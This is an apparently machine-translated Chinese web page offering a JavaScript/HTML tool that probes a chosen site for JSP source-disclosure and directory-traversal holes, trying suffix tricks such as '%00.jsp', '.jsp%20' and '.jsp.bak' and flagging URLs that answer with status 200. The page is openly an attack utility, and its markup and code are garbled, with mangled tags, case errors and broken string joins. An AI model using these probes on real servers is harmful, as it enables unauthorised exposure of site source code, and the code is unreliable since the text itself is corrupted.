hEAD>
Body {font-family: "Song", "Song"; Font-size: 9pt; line-height: 12pt}
Br {font-family: "Song", "Song"; Font-size: 9pt; line-height: 12pt}
TD {font-family: "Song"; font-size: 9pt; line-height: 12pt}
a {color: #llccxx; text-decoration: none}
A: Hover {color: #llccxx; text-decoration: none}
style>
Haiyang Top Network JSP Order and Directory Web Use Help:
The first write domain name; the second write path; the third write file name, pay attention not to add the name:
pre>
>>
>>
div>Function ISEXIST (URL)
{
Var myObject = new object ();
MyObject.lcx1 = ".jsp.";
MyObject.lcx2 = ".jsp ";
MyObject.lcx3 = ".jsp% 20";
MyObject.lcx4 = ".jsp% 2E";
MyObject.lcx5 = ".jsp% 70";
MyObject.lcx6 = ".jsp% 81";
MyObject.lcx7 = ".jsp% 2581";
MyObject.lcx8 = ".jsp";
MyObject.lcx9 = ".jsp";
MyObject.lcx10 = ".jsp.bak";
t.innerHTML = "directory traversal method
, for the time being received so much:
"T. InnerHtml = "" http.value path.Value "
"; T. InnerHtml = "" http.value path.value "% 00.jsp
";T. InnerHTML = "" http.value path.Value "% 3F.jsp
"T. InnerHtml = " " http.value path.value " ?. JSP
t.innerHTML = "" http.value path.value "web_inf /
";t.innerHTML = "estimated that the storm had a link must exist or an error source loophole, I do not talk nonsense, I do not without flaws column, rain cloudy idle is idle, one by one tap to see it:
< Br> "For (LCX in MyObject)
{
XMLHTTP = New ActiveXObject ("Microsoft.xmlhttp")
XMLHTTP.Open ("get", http.value path.value cindex.value myobject [lcx], false)
Xmlhttp.send ()
IF (xmlhttp.status == 200)
T. InnerHtml = " " http.value path.Value Cindex.Value MyObject [LCX] "
font> ";Else
T. Innerhtml = http.value path.value cindex.value myObject [lcx] "You are white, there is no vulnerability, do not need to point
";}
}
script>
center>
转载请注明原文地址:https://www.9cbs.com/read-36245.html